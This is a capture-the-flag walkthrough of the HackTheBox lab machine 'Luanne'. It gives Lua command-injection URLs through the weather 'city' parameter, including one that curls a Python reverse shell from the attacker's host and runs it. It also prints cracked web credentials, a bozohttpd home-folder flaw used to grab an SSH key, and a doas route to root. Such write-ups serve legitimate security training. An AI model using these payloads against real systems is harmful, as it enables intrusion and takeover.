Luanne Box Writeup & Walkthrough – [HTB] – HackTheBox

Introduction

Luanne is a machine on the HackTheBox.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.

This article will show how to hack Luanne box and get user.txt and root.txt.

Enumuration

First, I used NMAP to Scan the open ports and see if there any port is open. As we can see, the open ports are: 22, 80 and 9001.

Then, Navigate to the following URL. Observe that obtained an endpoint.

http://10.129.121.38/robots.txt

Use Gobuster to enumurate the endpoint, and finally, I identified a valid endpoint:

http://10.129.121.38/weather/forecast?city=list

Hack Luanne Box

Get User.txt

The City parameter is vulnerable to command injection. I can samply execute OS command by naviagate to the following URL.

http://10.129.121.38/weather/forecast?city=a') os.execute('OS_Command')--

For example:

http://10.129.121.38/weather/forecast?city=a') os.execute('id')--

Due the the OS is not a standard Linux OS, and there are only limited command available. I then find out “python” location by using find command.

http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27find+/+-name+"*python3.7*"%27)--

Then, I created a python reverse shell, and host a HTTP server locally.

Download the reverse shell to /tmp folder by navigating to the following URL

http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27curl+http://10.10.17.26/1.py+-o+/tmp/1.py%27)--

Finally, I gained a reverse shell by navigate to the following URL.

http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27/usr/pkg/bin/python3.7+/tmp/1.py%27)--

Execute following command to obain open ports. Observe that the port 3001 is open.

netstat -an

There also is a .htpasswd file

After crack the .htpasswd file, I gained the following credentials:

webapi_user
iamthebest

Execute following command to visit the port 3001 website:

curl -v --user webapi_user:iamthebest http://127.0.0.1:3001/

Observe that the server is running bozohttpd as shown in the screenshot below:

According to this Article, there are several vulnerabilities on this application (CVE-2010-2320,CVE-2010-2195). Attackers are able to visit an user’s home folder by providing a “~”.

Try to access r.michaels home folder by executing following command.

curl -v --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/

Observe that successful accessed as shown in the screenshot below:

Download the id_rsa file, and then login as r.michaels user.

I obtained the user.txt file.

Get Root.txt

After enumuration, obtained a backup file: /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc

Tried openssl, but not work. Then, I used following command to decrypt it:

netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/1.tar.gz

Observe that decrypt successfully as shown in the screenshot below:

Then, identified another .htpasswd file in the tar file.

After cracking the hash, obtained antoher credential:

webapi_user
littlebear

Check doas configuration, obtained that the current user is able to run command as root.

cat /usr/pkg/etc/doas.conf

Then, using above credential and execute following command to swap to root uesr.

doas -u root /bin/sh

There are more HackTheBox Writeup.